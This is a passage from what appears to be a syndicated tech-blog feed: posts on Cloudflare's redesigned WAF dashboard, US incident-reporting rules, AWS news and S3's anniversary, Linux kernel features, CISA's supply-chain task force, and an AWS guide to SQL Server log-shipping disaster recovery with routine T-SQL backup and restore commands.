Further, some important updates are coming for these features. Advanced rate limiting rules will be launched as part of Security Week, and every customer will also get a free set of managed rules to protect all traffic from high profile vulnerabilities. And finally, in the next few months, firewall rules will move to the Ruleset Engine, adding more powerful capabilities thanks to the new Ruleset API. Feeling excited?

How customers shaped the future of WAF

Almost 500 customers participated in this user research study that helped us learn about needs and context of use. We employed four research methods, all of which were conducted in an unmoderated manner; this meant people around the world could participate remotely at a time and place of their choosing.

- Card sorting involved participants grouping navigational elements into categories that made sense to them.

- Tree testing assessed how well or poorly a proposed navigational structure performed for our target audience.

- Design evaluation involved a task-based approach to measure effectiveness and utility of design concepts.

- Survey questions helped us dive deeper into the results and paint a picture of our participants.

Results of this four-pronged study informed changes to both WAF and Security that are detailed below.

The new WAF experience

The final result reveals the WAF as part of a broader Security category, which also includes Bots, DDoS, API Shield and Page Shield. This destination enables you to create your rules (a.k.a. firewall rules), deploy Cloudflare managed rules, set rate limit conditions, and includes handy tools to protect your web applications.

All customers across all plans will now see the WAF products organized as below:

- Firewall rules allow you to create custom, user-defined logic by blocking or allowing traffic that leverages all the components of the HTTP requests and dynamic fields computed by Cloudflare, such as Bot score.

- Rate limiting rules include the traditional IP-based product we launched back in 2018 and the newer Advanced Rate Limiting for Enterprise customers on the Advanced plan (coming soon).

- Managed rules allow customers to deploy sets of rules managed by the Cloudflare analyst team. These rulesets include a “Cloudflare Free Managed Ruleset” currently being rolled out for all plans including FREE, as well as Cloudflare Managed, OWASP implementation, and Exposed Credentials Check for all paying plans.

- Tools give access to IP Access Rules, Zone Lockdown and User Agent Blocking. Although still actively supported, these products cover specific use cases that can be covered using firewall rules. However, they remain a part of the WAF toolbox for convenience.

Redesigning the WAF experience

Gestalt design principles suggest that “elements which are close in proximity to each other are perceived to share similar functionality or traits.” This principle, together with the input from our customers, informed our design decisions.

After reviewing the responses of the study, we understood the importance of making it easy to find the security products in the Dashboard, and the need to make it clear how particular products were related to or worked together with each other.

Crucially, the page needed to:

- Display each type of rule we support, i.e. firewall rules, rate limiting rules and managed rules

- Show the usage amount of each type

- Give the customer the ability to add a new rule and manage existing rules

- Allow the customer to reprioritise rules using the existing drag and drop behavior

- Be flexible enough to accommodate future additions and consolidations of WAF features

We iterated on multiple options, including predominantly vertical page layouts, table-based page layouts, and even accordion-based page layouts. Each of these options, however, would force us to replicate buttons of similar functionality on the page. Given the risk of causing additional confusion, we abandoned these options in favor of a horizontal, tabbed page layout.

How can I get it?

As of today, we are launching this new design of WAF to everyone! In the meantime, we are updating documentation to walk you through how to maximize the power of Cloudflare WAF.

Looking forward

This is the starting point of our journey to make Cloudflare WAF not only powerful but also easy to adapt to your needs. We are evaluating approaches to empower your decision-making process when protecting your web applications. As threat intelligence grows and the options for creating rules multiply, we want to shorten your path from detecting a possible threat (for example, in the security overview) to setting up the right rule to mitigate it. Stay tuned!

US Critical Infrastructure Companies Will Have to Report When They Are Hacked

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/us-critical-infrastructure-companies-will-have-to-report-when-they-are-hacked.html

This will be law soon:

Companies critical to U.S. national interests will now have to report when they’re hacked or they pay ransomware, according to new rules approved by Congress.

[…]

The reporting requirement legislation was approved by the House and the Senate on Thursday and is expected to be signed into law by President Joe Biden soon. It requires any entity that’s considered part of the nation’s critical infrastructure, which includes the finance, transportation and energy sectors, to report any “substantial cyber incident” to the government within three days and any ransomware payment made within 24 hours.

Even better would be if they had to report it to the public.

Audemars Piguet 50th anniversary – K11 Hong Kong

Post Syndicated from Matt Granger original https://www.youtube.com/watch?v=oUi-VZavZ-M

AWS Week in Review – March 14, 2022

Post Syndicated from Steve Roberts original https://aws.amazon.com/blogs/aws/aws-week-in-review-march-14-2022/

Welcome to the March 14 AWS Week in Review post, and Happy Pi Day! I hope you managed to catch some of our livestreamed Pi day celebration of the 16th birthday of Amazon Simple Storage Service (Amazon S3). I certainly had a lot of fun in the event, along with my co-hosts – check out the end of this post for some interesting facts and fun from the day.

First, let’s dive right into the news items and launches from the last week that caught my attention.

Last Week’s Launches

New X2idn and X2iedn EC2 Instance Types – Customers with memory-intensive workloads and a requirement for high networking bandwidth may be interested in the newly announced X2idn and X2iedn instance types, which are built on the AWS Nitro system. Featuring third-generation Intel Xeon Scalable (Ice Lake) processors, these instance types can yield up to 50 percent higher compute price performance and up to 45 percent higher SAP Application Performance Standard (SAPS) performance than comparable X1 instances. If you’re curious about the suffixes on those instance type names, they specify processor and other information. In this case, the i suffix indicates that the instances are using an Intel processor, e means it’s a memory-optimized instance family, d indicates local NVMe-based SSDs physically connected to the host server, and n means the instance types support higher network bandwidth up to 100 Gbps. You can find out more about the new instance types in this news blog post.
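The suffix scheme described above can be sketched as a small lookup. This is only an illustration: the function name `describe_suffixes` is hypothetical, and the table covers just the four letters explained in this post, not the full AWS naming scheme.

```python
import re

# Meanings exactly as given in the post for the X2idn / X2iedn launch.
SUFFIX_MEANINGS = {
    "i": "Intel processor",
    "e": "memory-optimized instance family",
    "d": "local NVMe-based SSDs",
    "n": "higher network bandwidth (up to 100 Gbps)",
}


def describe_suffixes(instance_family):
    """Split a name such as 'X2iedn' into family, generation, and suffixes."""
    match = re.fullmatch(r"([a-z]+?)(\d+)([a-z]*)", instance_family.lower())
    if match is None:
        raise ValueError(f"unrecognized instance family: {instance_family!r}")
    _family, _generation, suffixes = match.groups()
    # Letters outside the table are reported as unknown rather than guessed.
    return [(letter, SUFFIX_MEANINGS.get(letter, "unknown")) for letter in suffixes]


if __name__ == "__main__":
    for name in ("X2idn", "X2iedn"):
        print(name, describe_suffixes(name))
```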

Amazon DynamoDB released two updates – First, an increase in the default service quotas raises the number of tables allowed by default from 256 to 2500 tables. This will help customers working with large numbers of tables. At the same time the service also increased the allowed number of concurrent table management operations, from 50 to 500. Table management operations are those that create, update, or delete tables. The second update relates to PartiQL, a SQL-compatible query language you can use to query, insert, update, or delete DynamoDB table data. You can now specify a limit on the number of items processed. You’ll find this useful when you know you only need to process a certain number of items, helping reduce the cost and duration of requests.
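As a rough sketch of the PartiQL limit, the helper below passes a `Limit` to the DynamoDB `ExecuteStatement` call. It assumes a boto3 DynamoDB client is supplied by the caller; the helper name `query_with_limit` and the table name are hypothetical.

```python
def query_with_limit(dynamodb_client, table_name, limit):
    """Run a PartiQL SELECT that processes at most `limit` items.

    `dynamodb_client` is assumed to be a boto3 DynamoDB client, for example
    boto3.client("dynamodb"). Limit caps the items processed by the request,
    which is not necessarily the number of items returned.
    """
    response = dynamodb_client.execute_statement(
        Statement=f'SELECT * FROM "{table_name}"',
        Limit=limit,
    )
    # NextToken is present when more items remain to be processed.
    return response.get("Items", []), response.get("NextToken")
```

A caller would typically loop, passing the returned token back as `NextToken`, until no token comes back.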

If you’re coding against Amazon ECS’s API, you may want to take a look at the change to UpdateService that now enables you to update load balancers, service registries, tag propagation, and ECS managed tags for a service. Previously, you would have had to delete and recreate the service to make changes to these resources. Now you can do it all with one call, making for a hassle-free, less disruptive, and more efficient experience. Take a look at the What’s New post for more details.
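A minimal sketch of such a single call, assuming a boto3 ECS client is passed in. The helper name `retarget_service` and all argument values are hypothetical; the keyword arguments are the `update_service` parameters that correspond to the resources named above.

```python
def retarget_service(ecs_client, cluster, service, target_group_arn,
                     container_name, container_port):
    """Update load balancer and tag settings of an existing service in place.

    `ecs_client` is assumed to be a boto3 ECS client, for example
    boto3.client("ecs"). No delete-and-recreate step is involved.
    """
    return ecs_client.update_service(
        cluster=cluster,
        service=service,
        loadBalancers=[
            {
                "targetGroupArn": target_group_arn,
                "containerName": container_name,
                "containerPort": container_port,
            }
        ],
        propagateTags="SERVICE",    # copy tags from the service to its tasks
        enableECSManagedTags=True,  # let ECS add its managed tags
    )
```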

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News

If you’re analyzing time series data, take a look at this new book on building forecasting models and detecting anomalies in your data. It’s authored by Michael Hoarau, an AI/ML Specialist Solutions Architect at AWS.

March 8 was International Women’s Day and we published a post featuring several women, including fellow news blogger and published author Antje Barth, chatting about their experiences working in Developer Relations at AWS.

Upcoming AWS Events

Check your calendars and sign up for these AWS events:

.NET Application Modernization Webinar (March 23) – Sign up today to learn about .NET modernization, what it is, and why you might want to modernize. The webinar will include a deep dive focusing on the AWS Microservice Extractor for .NET.

AWS Summit Brussels is fast approaching on March 31st. Register here.

Pi Day Fun & Facts

As this post is published, we’re coming to the end of our livestreamed Pi Day event celebrating the 16th birthday of S3 – how time flies! Here are some interesting facts & fun snippets from the event:

- In the keynote, we learned S3 currently stores over 200 trillion objects, and serves over 100 million requests per second!

- S3’s Intelligent Tiering has saved customers over $250 million to date.

- Did you know that S3, having reached 16 years of age, is now eligible for a Washington State driver’s license? Or that it can now buy a lottery ticket, get a passport, or – check this – it can pilot a hang glider!

- We asked each of our guests on the livestream, and the team of AWS news bloggers, to nominate their favorite pie. The winner? It’s a tie between apple and pecan pie!

That’s all for this week. Check back next Monday for another Week in Review!

Improving the reliability of file system monitoring tools (Collabora blog)

Post Syndicated from original https://lwn.net/Articles/887841/

Gabriel Krisman Bertazi describes the new FAN_FS_ERROR event type added to the fanotify mechanism in 5.16.

This is why we worked on a new mechanism for closely monitoring volumes and notifying recovery tools and sysadmins in real-time that an error occurred. The feature, merged in kernel 5.16, won’t prevent failures from happening, but will help reduce the effects of such errors by guaranteeing any listener application receives the message. A monitoring application can then reliably report it to system administrators and forward the detailed error information to whomever is unlucky enough to be tasked with fixing it.

The Experiment Podcast: Is ‘Latino’ A Real Identity?

Post Syndicated from The Atlantic original https://www.youtube.com/watch?v=bnEa5XbYcKM

Welcome to AWS Pi Day 2022

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/welcome-to-aws-pi-day-2022/

We launched Amazon Simple Storage Service (Amazon S3) sixteen years ago today!

As I often told my audiences in the early days, I wanted them to think big thoughts and dream big dreams! Looking back, I think it is safe to say that the launch of S3 empowered them to do just that, and initiated a wave of innovation that continues to this day.

Bigger, Busier, and more Cost-Effective

Our customers count on Amazon S3 to provide them with reliable and highly durable object storage that scales to meet their needs, while growing more and more cost-effective over time. We’ve met those needs and many others; here are some new metrics that prove my point:

Object Storage – Amazon S3 now holds more than 200 trillion (2 x 10^14) objects. That’s almost 29,000 objects for each resident of planet Earth. Counting at one object per second, it would take 6.342 million years to reach this number! According to Ethan Siegel, there are about 2 trillion galaxies in the visible Universe, so that’s 100 objects per galaxy! Shortly after the 2006 launch of S3, I was happy to announce the then-impressive metric of 800 million stored objects, so the object count has grown by a factor of 250,000 in less than 16 years.

Request Rate – Amazon S3 now averages over 100 million requests per second.

Cost Effective – Over time we have added multiple storage classes to S3 in order to optimize cost and performance for many different workloads. For example, AWS customers are making great use of Amazon S3 Intelligent Tiering (the only cloud storage class that delivers automatic storage cost savings when data access patterns change), and have saved more than $250 million in storage costs as compared to Amazon S3 Standard. When I first wrote about this storage class in 2018, I said:

In order to make it easier for you to take advantage of S3 without having to develop a deep understanding of your access patterns, we are launching a new storage class, S3 Intelligent-Tiering.

With the improved cost optimizations for small and short-lived objects and the archiving capabilities that we launched late last year, you can now use S3 Intelligent-Tiering as the default storage class for just about every workload, especially data lakes, analytics use cases, and new applications.
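The object-count comparisons in the Object Storage item above can be checked with a few lines of arithmetic. This is a sketch using only the figures quoted in the post, and it assumes a 365-day year for the counting estimate; the per-resident figure is left out because it depends on the population value assumed.

```python
OBJECTS = 2 * 10**14              # more than 200 trillion objects
GALAXIES = 2 * 10**12             # about 2 trillion galaxies
OBJECTS_2006 = 800 * 10**6        # 800 million objects shortly after launch
SECONDS_PER_YEAR = 365 * 24 * 60 * 60  # assumption: a 365-day year

# Counting one object per second, expressed in millions of years.
million_years_to_count = OBJECTS / SECONDS_PER_YEAR / 10**6
objects_per_galaxy = OBJECTS // GALAXIES
growth_factor = OBJECTS // OBJECTS_2006

print(f"{million_years_to_count:.3f} million years to count")
print(f"{objects_per_galaxy} objects per galaxy")
print(f"{growth_factor:,}x growth since 2006")
```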

Customer Innovation

As you can see from the metrics above, our customers use S3 to store and protect vast amounts of data in support of an equally vast number of use cases and applications. Here are just a few of the ways that our customers are innovating:

NASCAR –  After spending 15 years collecting video, image, and audio assets representing over 70 years of motor sports history, NASCAR built a media library that encompassed over 8,600 LTO 6 tapes and a few thousand LTO 4 tapes, with a growth rate of between 1.5 PB and 2 PB per year. Over the course of 18 months they migrated all of this content (a total of 15 PB) to AWS, making use of the Amazon S3 Standard, Amazon S3 Glacier Flexible Retrieval, and Amazon S3 Glacier Deep Archive storage classes. To learn more about how they migrated this massive and invaluable archive, read Modernizing NASCAR’s multi-PB media archive at speed with AWS Storage.

Electronic Arts – This game maker’s core telemetry systems handle tens of petabytes of data, tens of thousands of tables, and over 2 billion objects. As their games became more popular and the volume of data grew, they were facing challenges around data growth, cost management, retention, and data usage. In a series of updates, they moved archival data to Amazon S3 Glacier Deep Archive, implemented tag-driven retention management, and implemented Amazon S3 Intelligent-Tiering. They have reduced their costs and made their data assets more accessible; read Electronic Arts optimizes storage costs and operations using Amazon S3 Intelligent-Tiering and S3 Glacier to learn more.

NRGene / CRISPR-IL – This team came together to build a best-in-class gene-editing prediction platform. CRISPR (A Crack In Creation is a great introduction) is a very new and very precise way to edit genes and effect changes to an organism’s genetic makeup. The CRISPR-IL consortium is built around an iterative learning process that allows researchers to send results to a predictive engine that helps to shape the next round of experiments. As described in A gene-editing prediction engine with iterative learning cycles built on AWS, the team identified five key challenges and then used AWS to build GoGenome, a web service that performs predictions and delivers the results to users. GoGenome stores over 20 terabytes of raw sequencing data, and hundreds of millions of feature vectors, making use of Amazon S3 and other AWS storage services as the foundation of their data lake.

Some other cool recent S3 success stories include Liberty Mutual (How Liberty Mutual built a highly scalable and cost-effective document management solution), Discovery (Discovery Accelerates Innovation, Cuts Linear Playout Infrastructure Costs by 61% on AWS), and Pinterest (How Pinterest worked with AWS to create a new way to manage data access).

Join Us Online Today

In celebration of AWS Pi Day 2022 we have put together an entire day of educational sessions, live demos, and even a launch or two. We will also take a look at some of the newest S3 launches including Amazon S3 Glacier Instant Retrieval, Amazon S3 Batch Replication and AWS Backup Support for Amazon S3.

Designed for system administrators, engineers, developers, and architects, our sessions will bring you the latest and greatest information on security, backup, archiving, certification, and more. Join us at 9:30 AM PT on Twitch for Kevin Miller’s kickoff keynote, and stick around for the entire day to learn a lot more about how you can put Amazon S3 to use in your applications. See you there!

— Jeff;

[$] Triggering huge-page collapse from user space

Post Syndicated from original https://lwn.net/Articles/887753/

When the kernel first gained support for huge pages, most of the work was left to user space. System administrators had to set aside memory in the special hugetlbfs filesystem for huge pages, and programs had to explicitly map memory from there. Over time, the transparent huge pages mechanism automated the task of using huge pages. That mechanism is not perfect, though, and some users feel that they have better knowledge of when huge-page use makes sense for a given process. Thus, huge pages are now coming full circle with this patch set from Zach O’Keefe returning huge pages to user-space control.

Dr. Moogega Cooper | Limitless: The Real Life Guardian of the Galaxy | Talks at Google

Post Syndicated from Talks at Google original https://www.youtube.com/watch?v=hVElt8IsiKw

Upcoming Speaking Events

Post Syndicated from Schneier.com Webmaster original https://www.schneier.com/blog/archives/2022/03/upcoming-speaking-events.html

This is a current list of where and when I am scheduled to speak:

- I’m participating in an online panel discussion on “Ukraine and Russia: The Online War,” hosted by UMass Amherst, at 5:00 PM Eastern on March 31, 2022.

- I’m speaking at Future Summits in Antwerp, Belgium on May 18, 2022.

- I’m speaking at IT-S Now 2022 in Vienna on June 2, 2022.

- I’m speaking at the 14th International Conference on Cyber Conflict, CyCon 2022, in Tallinn, Estonia on June 3, 2022.

- I’m speaking at the RSA Conference 2022 in San Francisco, June 6-9, 2022.

- I’m speaking at the Dublin Tech Summit in Dublin, Ireland, June 15-16, 2022.

The list is maintained on this page.

Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/887807/

Security updates have been issued by Debian (expat, haproxy, libphp-adodb, nbd, and vim), Fedora (chromium, cobbler, firefox, gnutls, linux-firmware, radare2, thunderbird, and usbguard), Mageia (gnutls), Oracle (.NET 5.0, .NET 6.0, .NET Core 3.1, firefox, and kernel), SUSE (firefox, tomcat, and webkit2gtk3), and Ubuntu (libxml2 and nbd).

An Inside Look at CISA’s Supply Chain Task Force

Post Syndicated from Chad Kliewer, MS, CISSP, CCSP original https://blog.rapid7.com/2022/03/14/an-inside-look-at-cisas-supply-chain-task-force/

When one mentions supply chains these days, we tend to think of microchips from China causing delays in automobile manufacturing or toilet paper disappearing from store shelves. Sure, there are some chips in the communications infrastructure, but the cyber supply chain is mostly about virtual things – the ones you can’t actually touch.

In 2018, the Cybersecurity and Infrastructure Security Agency (CISA) established the Information and Communications Technology (ICT) Supply Chain Risk Management (SCRM) Task Force as a public-private joint effort to build partnerships and enhance ICT supply chain resilience. To date, the Task Force has worked on 7 Executive Orders from the White House that underscore the importance of supply chain resilience in critical infrastructure.

Background

The ICT-SCRM Task Force is made up of members from the following sectors:

- Information Technology (IT) – Over 40 IT companies, including service providers, hardware, software, and cloud have provided input.

- Communications – Nearly 25 communications associations and companies are included, with representation from the wireline, wireless, broadband, and broadcast areas.

- Government – More than 30 government organizations and agencies are represented on the Task Force.

These three sector groups touch nearly every facet of critical infrastructure that businesses and government require. The Task Force is dedicated to identifying threats and developing solutions to enhance resilience by reducing the attack surface of critical infrastructure. This diverse group is poised perfectly to evaluate existing practices and elevate them to new heights by enhancing existing standards and frameworks with up-to-date practical advice.

Working groups

The core of the task force is the working groups. These groups are created and disbanded as needed to address core areas of the cyber supply chain. Some of the working groups have been concentrating on areas like:

- The legal risks of information sharing

- Evaluating supply chain threats

- Identifying criteria for building Qualified Bidder Lists and Qualified Manufacturer Lists

- The impacts of the COVID-19 pandemic on supply chains

- Creating a vendor supply chain risk management template

Ongoing efforts

After two years of producing some great resources and rather large reports, the ICT-SCRM Task Force recognized the need to ensure organizations of all sizes can take advantage of the group’s resources, even if they don’t have a dedicated risk management professional at their disposal. This led to the creation of both a Small and Medium Business (SMB) working group, as well as one dedicated to Product Marketing.

The SMB working group chose to review and adapt the Vendor SCRM template for use by small and medium businesses, which shows the template can be a great resource for companies and organizations of all sizes.

Out of this template, the group described three cyber supply chain scenarios that an SMB (or any size organization, really) could encounter. From that, the group further simplified the process by creating an Excel spreadsheet that provides a document that is easy for SMBs to share with their prospective vendors and partners as a tool to evaluate their cybersecurity posture. Most importantly, the document does not promote a checkbox approach to cybersecurity — it allows for partial compliance, with room provided for explanations. It also allows many of the questions to be removed if the prospective partner possesses a SOC1/2 certification, thereby eliminating duplication in questions.

What the future holds

At the time of this writing, the Product Marketing and SMB working groups are hard at work making sure everyone, including the smallest businesses, is using the ICT-SCRM Task Force resources to their fullest potential. Additional workstreams are being developed and will be announced soon, and these will likely include expansion with international partners and additional critical-infrastructure sectors.

For more information, you can visit the CISA ICT-SCRM Task Force website.

Extend SQL Server DR using log shipping for SQL Server FCI with Amazon FSx for Windows configuration

Post Syndicated from Yogi Barot original https://aws.amazon.com/blogs/architecture/extend-sql-server-dr-using-log-shipping-for-sql-server-fci-with-amazon-fsx-for-windows-configuration/

This week for Women’s History Month, we’re continuing to feature female authors. We’re showcasing women in the tech industry who are building, creating, and, above all, inspiring, empowering, and encouraging everyone—especially women and girls—in tech.

Companies choosing to rehost their on-premises SQL Server workloads to AWS can face challenges with setting up their disaster recovery (DR) strategy. Solutions such as Always On can be a more expensive, complex configuration across Regions. It can cause latency issues when synchronously replicating data cross-Region. Snapshots have additional overhead and may breach their stringent recovery point objective/recovery time objective (RPO/RTO) requirements.

A log shipping solution can take advantage of cross-Region replication of data using Amazon FSx for Windows File Server. It has less maintenance overhead, doesn’t introduce latency, and meets RPO/RTO requirements. A multi-Region architecture for Microsoft SQL Server is often adopted for SQL Server deployments for business continuity (disaster recovery) and improved latency (for a geographically distributed customer base).

This blog post explores SQL Server DR architecture using SQL Server failover cluster with Amazon FSx for Windows File Server for the primary site and secondary DR site. We describe how to set up a multi-Region DR using log shipping. We’ll explain the architecture patterns so you can follow along and effectively design a highly available SQL Server deployment that spans two or more AWS Regions.

Here are some advantages of using log shipping versus an Always On distributed availability group DR setup.

- Log shipping works with SQL Server Standard edition

- It lowers total cost of ownership (TCO) as you only need one SQL Server Standard edition license at the primary/DR site

- It’s straightforward to configure

- There’s no need for clustering setup at the OS level

- It supports all SQL Server versions. You don’t need the SQL Server version to be the same for source and destination instances.

Log shipping DR solution for SQL Server FCI with Amazon FSx

The architecture diagram in Figure 1 depicts SQL Server failover cluster instance (FCI) using Amazon FSx as storage (multiple Availability Zones) in Region 1. It uses a standalone or a similar setup on Region 2. It uses a log shipping feature for replication and DR. This will also serve as the reference architecture for our solution.

Figure 1. Log shipping DR solution for SQL Server FCI with Amazon FSx

Figure 1 shows an SQL cluster in Region 1 and standalone SQL cluster in Region 2. The primary cluster in Region 1 is initially configured with SQL Server failover cluster instance (FCI) using Amazon FSx for its shared storage. Region 2 can have a standalone Amazon EC2 server with SQL Server and Amazon Elastic Block Store (EBS) as storage. Or it can have an identical configuration to Region 1, but with different hostnames, and an SQL network name (SQLFCI02) to avoid possible collisions.

You can build the VPC peering or AWS Transit Gateway to have seamless connectivity between the two Regions for the opened ports (SQL Server, SMB for file share, and others.)

With Amazon FSx, you get a fully managed, shared file storage solution that automatically replicates the underlying storage synchronously across multiple Availability Zones. Amazon FSx provides high availability with automatic failure detection and automatic failover if there are any hardware or storage issues. The service fully supports continuously available shares, a feature that permits SQL Server uninterrupted access to shared file data.

There is an asynchronous replication setup from Region 1 to Region 2 using the log shipping feature. In this type of configuration, Microsoft SQL Server log shipping replicates databases using transaction logs. This ensures that a physically replicated warm standby database is an exact binary replica of the primary database. This is referred to as physical replication.

Log shipping can be configured with two available modes. These are related to the state of the secondary log-shipped SQL Server database.

- Standby mode. The database is available for querying. Users cannot access the database while a restore is in progress, but once the restore completes, they can access it in read-only mode.

- Restore mode. The database is not accessible for users.

In this solution, you configure a warm standby SQL Server database on an EC2 instance designated in SQL FCI using Amazon FSx as shared storage. You can send transaction log backups asynchronously between your primary Region database and the warm standby server in the other Region. The transaction log backups are then applied to the warm standby database sequentially. When all the logs have been applied, you can perform a manual failover and point the application to the secondary Region. We recommend running the primary and secondary database instances in separate Availability Zones, and configuring a monitor instance to track all the details of log shipping.
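The sequential apply step and the two modes described above can be sketched by generating the corresponding T-SQL. This is an illustration only: SQL Server's log shipping jobs normally do this work for you, and the function names, database name, and file names here are hypothetical. The sketch also assumes that backup file names sort chronologically.

```python
def build_restore_statements(database, backup_files, standby_undo_file=None):
    """Return RESTORE LOG statements that apply log backups in order.

    With `standby_undo_file` set, each restore uses STANDBY, which leaves the
    database readable between restores (standby mode). Otherwise NORECOVERY
    keeps it inaccessible to users (restore mode).
    """
    if standby_undo_file:
        option = f"STANDBY = N'{standby_undo_file}'"
    else:
        option = "NORECOVERY"
    # Assumption: file names sort in the order the backups were taken.
    return [
        f"RESTORE LOG [{database}] FROM DISK = N'{path}' WITH {option};"
        for path in sorted(backup_files)
    ]


def build_recovery_statement(database):
    """Return the statement that brings the standby online at failover."""
    return f"RESTORE DATABASE [{database}] WITH RECOVERY;"


if __name__ == "__main__":
    for stmt in build_restore_statements(
        "Sales", ["Sales_0002.trn", "Sales_0001.trn"], "Sales_undo.tuf"
    ):
        print(stmt)
    print(build_recovery_statement("Sales"))
```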

Prerequisites

- Configure two SQL Server clusters with FCI in Region 1 and Region 2, or have SQL Server cluster on Region 1 and Amazon EC2 with SQL Server with EBS on Region 2. Learn more about how to set up SQL Server FCI with Amazon FSx.

- Configure VPC peering or Transit Gateway for the VPCs (where the SQL Server clusters reside).

- VPC peering – Learn more about setting up Inter-Region VPC Peering.

- Transit gateway – Similar to VPC peering. Learn how to Use an AWS Transit Gateway to Simplify Your Network Architecture and Scaling VPN throughput using AWS Transit Gateway.

- Configure networking and security to work across the peering connection or Transit Gateway.

- Verify that Amazon FSx and SQL connectivity is seamless across both Regions. For example, we should be able to connect Amazon FSx and SQL Server remotely from one Region to the other. Confirm that security group rules are in place. Learn more about FSx for Windows File Server.

- SQL Server must not be running Express edition; log shipping supports all editions except Express.

- Give shared folders on primary and secondary Regions appropriate permissions so the network path is accessible across Regions.

- The databases for log shipping must use the FULL recovery model. Learn more about log shipping.
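The edition and recovery model prerequisites above can be verified before setup. The sketch below assumes you have already fetched the edition string (for example with `SELECT SERVERPROPERTY('Edition')`) and each database's `recovery_model_desc` from `sys.databases`; the function name and sample values are hypothetical.

```python
def log_shipping_blockers(edition, recovery_models):
    """Return a list of reasons log shipping cannot be configured yet.

    `edition` is the server edition string; `recovery_models` maps each
    database name to its recovery_model_desc value.
    """
    problems = []
    if "express" in edition.lower():
        problems.append("Express edition does not support log shipping")
    for name, model in sorted(recovery_models.items()):
        if model.upper() != "FULL":
            problems.append(f"{name}: recovery model is {model}, expected FULL")
    return problems


if __name__ == "__main__":
    print(log_shipping_blockers(
        "Standard Edition (64-bit)",
        {"Sales": "FULL", "Staging": "SIMPLE"},
    ))
```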

Walkthrough steps to set up DR for SQL Server FCI

Following are the steps required to configure SQL Server DR using SQL Server failover cluster. Amazon FSx for Windows File Server is used for the primary site and secondary DR site. We also demonstrate how to set up a multi-Region log shipping.

Assumed variables

Region_01:

WSFC Cluster Name: SQLCluster1

FCI Virtual Network Name: SQLFCI01

Region_02:

Amazon EC2 Name: EC2SQL2

Make sure to configure network connectivity between your clusters. In this solution, we are using two VPCs in two separate Regions.

- VPC peering is configured to enable network traffic between both VPCs.

- The domain controllers (AWS Managed Microsoft AD) in both VPCs are configured with conditional forwarding. This enables DNS resolution between the two VPCs.

- Configure SQL FCI setup using Amazon FSx as shared storage on Region_01.

- Configure SQL standalone instance on Region_02 with EBS volume as storage.

- Create an Amazon FSx file system in the primary Region with AWS Managed Microsoft AD, or with an on-premises Active Directory connected through a trust relationship or AD Connector.

- Create a SQL Server service account with proper permissions to be able to set up transaction log settings.

- Configure VPC peering between the primary and DR/secondary Region.

- Join both the primary and secondary servers to the Active Directory domain in the primary Region.

- Mount Amazon FSx on the primary and secondary servers and grant share permissions so that SQL Server can access the folder. Use Amazon FSx for storing transaction log backups and EBS for storing transaction logs in the secondary Region.

- Set up log shipping from the primary server SQLFCI01 to the secondary server EC2SQL02 with the standby option enabled. This keeps the databases readable (read-only) on the secondary SQL Server.

- In case of disaster, follow the FAILOVER and FAILBACK steps in the next sections. Learn more by reading Change Roles Between Primary and Secondary Log Shipping Servers.
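
The standby option in the log shipping step corresponds to restoring `WITH STANDBY` on the secondary. The sketch below shows a manual equivalent of what the log shipping jobs automate, plus a query against the log shipping monitor table in msdb. The `\\fsx-share\...` UNC path, the `D:\SQLStandby\...` undo file, and the backup file names are hypothetical placeholders, not values from this walkthrough.

```sql
-- On SQLFCI01 (primary): full backup used to initialize the secondary.
BACKUP DATABASE [DatabaseName]
TO DISK = N'\\fsx-share\logship\DatabaseName_full.bak'    -- hypothetical FSx path
WITH COMPRESSION, CHECKSUM;
GO

-- On EC2SQL02 (secondary): restore in standby (read-only) mode.
-- Add MOVE clauses if the data and log file paths differ on the EBS volume.
RESTORE DATABASE [DatabaseName]
FROM DISK = N'\\fsx-share\logship\DatabaseName_full.bak'
WITH STANDBY = N'D:\SQLStandby\DatabaseName_undo.tuf',    -- hypothetical undo file
     STATS = 10;
GO

-- On EC2SQL02: each later log backup is applied the same way, in sequence.
RESTORE LOG [DatabaseName]
FROM DISK = N'\\fsx-share\logship\DatabaseName_0001.trn'  -- hypothetical log backup
WITH STANDBY = N'D:\SQLStandby\DatabaseName_undo.tuf';
GO

-- On EC2SQL02: check how far the copy and restore jobs have progressed.
SELECT secondary_database, last_copied_file, last_restored_file,
       last_restored_date, last_restored_latency
FROM msdb.dbo.log_shipping_monitor_secondary;
```

A database restored with STANDBY accepts further log restores while allowing read-only queries between restores, which is why it suits a warm standby.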

Failover steps

If a disaster occurs at the primary Region node SQLFCI01, log shipping acts as the DR solution. The following steps bring the databases online on EC2SQL02. For a DR drill, follow all of the steps. In a real disaster, start from Step 3. Once SQLFCI01 is back online, use one of the failback methods described after these steps.

1. Stop all activity on the log-shipped databases on SQLFCI01, and stop the log shipping jobs on SQLFCI01 and EC2SQL02. Check whether any process is still using a database with the following query:

USE master
GO
SELECT * FROM sys.sysprocesses WHERE dbid = DB_ID('DatabaseName')

2. Take a full backup on SQLFCI01 as a rollback option.

BACKUP DATABASE [DatabaseName]
TO DISK = N'Provide Drive details'
WITH COMPRESSION
GO

3. Take a tail-log backup if SQLFCI01 is still accessible. Otherwise, find the last available transaction log backup stored on EC2SQL02 and restore it with RECOVERY to bring the databases online on EC2SQL02.

RESTORE LOG [DatabaseName] FROM DISK = N'Provide path of last tlog'
WITH FILE = 1, RECOVERY, NOUNLOAD, STATS = 10
GO

4. Redirect the application connections to EC2SQL02.
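
The failover steps above can be sketched in more detail as follows. This is one possible approach under stated assumptions, not the only way to run a failover. The job name `LSBackup_DatabaseName` and the `\\fsx-share\...` path are assumptions, so look up the real job names in `msdb.dbo.sysjobs` and substitute your own backup location.

```sql
-- Step 1 (drill only): list user sessions still connected to the database.
SELECT session_id, login_name, host_name, program_name, status
FROM sys.dm_exec_sessions
WHERE database_id = DB_ID(N'DatabaseName')
  AND is_user_process = 1;

-- Step 1 (drill only): disable a log shipping job so it cannot run mid-failover.
-- The job name below is an assumption; repeat for the copy and restore jobs.
EXEC msdb.dbo.sp_update_job
     @job_name = N'LSBackup_DatabaseName',
     @enabled  = 0;
GO

-- Step 3, on SQLFCI01 if it is still reachable: tail-log backup.
-- NORECOVERY leaves the primary in the restoring state, so no new changes land there.
BACKUP LOG [DatabaseName]
TO DISK = N'\\fsx-share\logship\DatabaseName_tail.trn'   -- hypothetical path
WITH NORECOVERY;
GO

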